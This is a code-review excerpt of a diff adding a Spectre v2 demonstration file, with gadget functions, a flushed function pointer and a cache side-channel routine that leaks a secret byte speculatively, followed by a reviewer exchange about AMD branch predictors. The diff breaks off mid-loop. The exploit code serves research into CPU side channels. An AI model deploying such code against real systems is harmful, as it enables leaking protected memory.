demos/spectre_v2.cc

```diff
@@ -0,0 +1,298 @@
+  }
+};
+
+template<> struct DummyCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    // Empty.
+  }
+};
+
+// We fastcall the readers in the 32-bit mode so that there is only one
+// instruction. Otherwise there would be two (fetch the pointer from the stack
+// and fetch from the pointer).
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+FirstActualRead(const void *addr) {
+  // We read the value 100 times to have enough places to jump to.
+  Fetches<100>::generate(addr);
+}
+
+// DummyRead is between the two real reads, so that misjump chances are the
+// highest possible.
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+DummyRead(const void *addr) {
+  // Does nothing - only NOPs.
+  Nops<100>::generate();
+}
+
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+SecondActualRead(const void *addr) {
+  // Read it one more time to avoid compiler deduplication with jump to the
+  // FirstActualRead.
+  Fetches<101>::generate(addr);
+}
+
+static char LeakByte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &oracle = sidechannel.GetOracle();
+
+  // Pointer to pointer to DummyRead so that we can easily flush it from
+  // the cache and start speculative execution.
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+  std::unique_ptr<void(*)(const void *)> dummy_reader =
+      std::unique_ptr<void(*)(const void *)>(new (void (*)(const void *)));
+#elif SAFESIDE_IA32
+  std::unique_ptr<void(SAFESIDE_FASTCALL *)(const void *)> dummy_reader =
+      std::unique_ptr<void(SAFESIDE_FASTCALL *)(const void *)>(
+          new (void (SAFESIDE_FASTCALL *)(const void *)));
+#else
+#  error Unsupported architecture.
+#endif
+
+  for (int run = 0;; ++run) {
+    sidechannel.FlushOracle();
+
+    // We pick a different offset every time so that it's guaranteed that the
+    // value of the in-bounds access is usually different from the secret value
+    // we want to leak via out-of-bounds speculative access.
+    size_t safe_offset = run % strlen(data);
+
+    // We are going to shift these pointers instruction-by-instruction (mov
+    // instruction in the case of real readers and nop instruction in the case
+    // of the dummy reader), so that we increase the amount of destination
+    // addresses;
+    char *first_ptr = reinterpret_cast<char *>(FirstActualRead);
+    char *second_ptr = reinterpret_cast<char *>(SecondActualRead);
+    char *dummy_ptr = reinterpret_cast<char *>(DummyRead);
+
+    for (int i = 0; i < 100; ++i) {
+      // Shift real readers to the next mov instruction and dummy reader to the
+      // next nop instruction to diversify destination addresses.
```

Comment:
Naively, it seems like creating a diversity of destination addresses wouldn't affect the likelihood of a BTB collision or might even make a collision _less_ likely by adding more entropy to the hash.

Did we maybe find this pattern was especially effective against AMD's branch predictors?

Reply:
The diversity of destination addresses is necessary for AMD CPUs.